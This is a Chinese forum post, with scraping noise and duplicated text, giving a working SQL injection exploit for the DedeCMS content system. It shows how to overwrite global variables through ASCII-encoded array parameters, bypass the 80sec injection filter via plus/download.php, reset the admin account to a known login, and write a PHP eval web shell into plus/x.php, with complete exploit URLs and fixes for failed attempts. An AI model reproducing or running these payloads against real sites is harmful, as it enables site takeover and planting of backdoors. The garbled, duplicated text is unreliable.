|
|
此漏洞无视gpc转义,过80sec注入防御。
9 N& P6 S. ~, z4 H4 ?: K补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?. q# T0 k+ Q4 y! `2 t
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。) C: }: h L% K4 E
include/dedesql.class.php; K z. E C$ B, B, ?" B
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。( S- h0 j( G2 h9 G& X- D0 \3 q
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
; \# Y4 S* j1 e* s" L而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
3 }( i. A. g+ p- J3 F m7 j! rplus/download.php
/ B- q/ B/ a( Q. `; v/ ?else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):( i- P- b! v# I" O/ V2 e8 g
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:* @' D9 C" C9 a: i4 f/ D U
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP: I: w* n0 s% B' I( E
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
+ X& U" a: f! {* P6 D+ D漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
" ^. A; K8 l: w如果找不到后台,参见以前修改数据库直接拿SHELL的方法
7 d9 n. l1 Z" b2 ]; d( IUPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
" z7 C2 g9 U, J3 u: |补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
& R0 I/ T& r+ w8 e" J0 D起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
+ I: O( C1 k4 linclude/dedesql.class.php$ w* O" z3 v( r2 @
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。6 i2 @ [7 Z: i6 z \
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
# I) V& U) }% Y/ @$ a* k! [而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。3 E0 y3 F3 n* {
plus/download.php
; ?% Q7 i2 z8 }" nelse if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
) j" k, L' ~# N- U) Vadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
. B3 m9 a; S1 w/ z6 KUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
) ~4 X) c. p$ s3 ^2 Z! ohttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin: ?1 M. a( d! h
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
* w" y6 O& K1 M0 |3 \如果找不到后台,参见以前修改数据库直接拿SHELL的方法
( [( w( [0 L! C. E+ `___FCKpd___6getshell:$ @* _3 |) r3 k
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m
! K& m/ g! d3 U4 q. o! D2 hhttp://127.0.0.1/plus/x.php
% R5 ]3 @5 o2 J6 M) ~* [update成功后还要访问下 /plus/mytag_js.php?aid=1( {7 U1 c7 _5 u+ D5 \$ J
失败原因:3 h+ h9 f( V, m" b; L9 m8 e: T' S
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
9 \: f l9 m: ?* b- O. Y! S2 b& ^配图:
( W5 q4 ~- S$ J% }" D) N1 k9 @& k1.查看dede当前版本
: n3 j, S( P6 H5 g! R+ z M2 T
$ y! g o8 J! O( E t2.执行exp
( |6 X/ F, |$ p5 C U! ]1 F" P$ S: h( [4 Y$ h
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台$ G, j9 M, I+ z. _' g
+ d) p# E( I2 x! H0 ]8 Sspider密码admin
4 d4 J5 y$ Z$ a& H3 U
- N8 m, J5 w- V1 S5 w7 q/ ?! [http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
- t `4 C* \2 }" V) q, D& m原作者:imspider
V" S' }! V' [+ z, y7 ^5 K" B) w0 H1 f
本博客测试+配图+getshell0 G# V& I( A2 }- E" j: e
POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
- _* k6 @( b6 _2 I" e
2 E# w8 o3 b" j T* F3 hgetshell:% @0 Q2 I% w' H) R, \
___FCKpd___7会在plus目录生成 x.php 密码 m4 e) F8 U; t3 {' K q/ S y0 e
http://127.0.0.1/plus/x.php* q* k8 C8 \1 h" Z
update成功后还要访问下 /plus/mytag_js.php?aid=1! I) e0 w* D9 W) E5 Y
失败原因:7 _+ V4 b0 z7 V" h
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
( c. O$ \# W: R配图:
2 ]; |0 K- l0 q5 g7 U1.查看dede当前版本
5 t( F( K0 q* j; g: A. Rhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png
$ m+ `6 C+ |# q& L; ?6 s2.执行exp
5 i" X& {, ~4 \ q, R" Lhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台; K6 w8 k+ h1 \9 m+ g; v4 Y
spider密码admin8 p% b7 K$ T2 A' M8 a( g
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png7 h! W( @6 K D
! H; C) C; B; Z8 F. G
|
|
发表于 2013-9-21 16:08:21
收藏
支持
反对